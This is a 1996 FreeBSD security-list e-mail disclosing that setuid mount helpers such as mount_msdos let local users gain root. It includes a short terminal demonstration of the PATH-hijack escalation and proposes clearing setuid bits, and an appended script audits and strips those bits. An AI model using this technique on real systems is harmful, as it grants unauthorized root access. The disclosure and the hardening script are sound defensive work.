Date: Fri, 17 May 1996 18:04:25 -0600 (MDT)
From: Dave Andersen <angio@aros.net>
To: jkh@time.cdrom.com
Cc: freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, angio@aros.net
Subject: Re: very bad (fwd)
Message-ID: <199605180004.SAA01785@shell.aros.net>

Since it's already out, I'm CC:'ing this to the general list.

chmod u-s /sbin/mount_union is *not* a complete fix. The mount_msdos
command is similarly vulnerable:

    bash$ export PATH=/tmp:$PATH
    bash$ whoami
    angio
    bash$ mount_msdos /asdf /tmp
    # whoami
    root

The only difference in this is that mount_msdos checks to see if the
mount point exists before it tries to mount it.

My suggestion:

    chmod ug-s /sbin/mount_*

-Dave Andersen

----- Forwarded message from invalid opcode -----

Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-(
And I would have sent it to security-officer@freebsd.org had I even known
of such an address.

The prepared fix is chmod u-s /sbin/mount_union.

== Chris Layne ======================================== Nervosa Computing ==
== coredump@nervosa.com ================ http://www.nervosa.com/~coredump ==

----- End of forwarded message from invalid opcode -----

--
angio@aros.net
Complete virtual hosting and business-oriented system administration
Internet services. (WWW, FTP, email)
http://www.aros.net/
http://www.aros.net/about/virtual
"There are only two industries that refer to their customers as 'users'."
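
Added example, not part of the original e-mail: a small audit for the point made above, that clearing the setuid bit on mount_union alone leaves the other mount_* helpers privileged. The function names are hypothetical and the directory is passed as an argument (the e-mail refers to /sbin).

```shell
#!/bin/sh
# Added example: audit mount_* helpers for setuid/setgid bits.
# Function names are hypothetical; the directory argument stands in for /sbin.

# Print every regular mount_* file in directory $1 that still carries
# a setuid or setgid bit, one path per line.
list_privileged_mount_helpers() {
    for f in "$1"/mount_*; do
        [ -f "$f" ] || continue      # unmatched glob or not a regular file
        [ -L "$f" ] && continue      # ignore symlinks, audit real files only
        if [ -u "$f" ] || [ -g "$f" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Apply the e-mail's suggestion (chmod ug-s) to each flagged helper in $1,
# then re-audit. Returns 0 only if nothing privileged remains.
strip_privileged_mount_helpers() {
    list_privileged_mount_helpers "$1" | while IFS= read -r f; do
        chmod ug-s "$f" && printf 'stripped %s\n' "$f"
    done
    remaining=$(list_privileged_mount_helpers "$1")
    [ -z "$remaining" ]
}

# Stand-alone use: read-only audit of the directory given on the command line.
if [ "$#" -gt 0 ]; then
    list_privileged_mount_helpers "$1"
fi
```

Run with a directory argument for a read-only listing; strip_privileged_mount_helpers changes file modes and needs the privileges to do so.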